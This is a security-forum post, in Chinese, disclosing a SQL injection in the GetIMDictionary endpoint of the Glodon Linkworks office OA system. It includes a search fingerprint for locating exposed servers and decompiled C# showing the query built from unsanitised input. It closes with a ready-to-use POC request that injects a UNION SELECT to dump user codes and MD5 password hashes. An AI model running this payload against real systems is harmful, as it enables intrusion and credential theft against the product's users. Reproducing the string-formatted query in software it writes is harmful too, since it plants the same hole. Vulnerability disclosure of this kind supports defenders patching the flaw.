问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Glodon Linkworks GetIMDictionary SQL注入漏洞
# Glodon Linkworks GetIMDictionary SQL注入漏洞 ## 漏洞描述 Glodon Linkworks办公OA GetIMDictionary接口存在SQL注入漏洞,发送请求包后可以获取数据库中的敏感信息 ## 漏洞影响...
Glodon Linkworks GetIMDictionary SQL注入漏洞 ======================================== 漏洞描述 ---- Glodon Linkworks办公OA GetIMDictionary接口存在SQL注入漏洞,发送请求包后可以获取数据库中的敏感信息 漏洞影响 ---- Glodon Linkworks 网络测绘 ---- web.body="/Services/Identification/" 漏洞复现 ---- 登陆页面 ![img](https://shs3.b.qianxin.com/butian_public/f225037a822e3c9c9f64cbad620cc1b27aecbb04aa137.jpg) ```c // GTP.IM.Services.Config.WebSite.WebService.IM.Config.ConfigService // Token: 0x06000018 RID: 24 RVA: 0x00004148 File Offset: 0x00002348 [WebMethod(Description = "得到IM系统配置")] public string GetIMDictionary(string key) { string str = string.Empty; ISysConfigService service = ServiceFactory.GetService<ISysConfigService>(); StringBuilder stringBuilder = new StringBuilder(); stringBuilder.AppendFormat("select F_VALUE from T_IM_DICTIONARY where f_key='{0}';", key); DataSet dataSet = GSqlDataAccess.SelectDataSet(service.DataSourceName, stringBuilder.ToString(), new DataParameter[0]); if (dataSet != null && dataSet.Tables.Count > 0 && dataSet.Tables[0] != null) { foreach (object obj in dataSet.Tables[0].Rows) { DataRow dataRow = (DataRow)obj; str = dataRow["F_VALUE"].ToString(); } } StringBuilder stringBuilder2 = new StringBuilder(); stringBuilder2.Append("<?xml version=\"1.0\" encoding=\"utf-8\"?>"); stringBuilder2.Append("<result value=\"" + str + "\" >"); stringBuilder2.Append("</result>"); return stringBuilder2.ToString(); } ``` ![image.png](https://shs3.b.qianxin.com/butian_public/f2329700e62183863ec929ea25d3ae7816d81b6e1b8c9.jpg) 验证POC ```php POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER -- ``` ![img](https://shs3.b.qianxin.com/butian_public/f4821243e754a959ff50c99ec41af3a40726cf4394117.jpg)
发表于 2024-07-12 18:46:04
阅读 ( 976 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!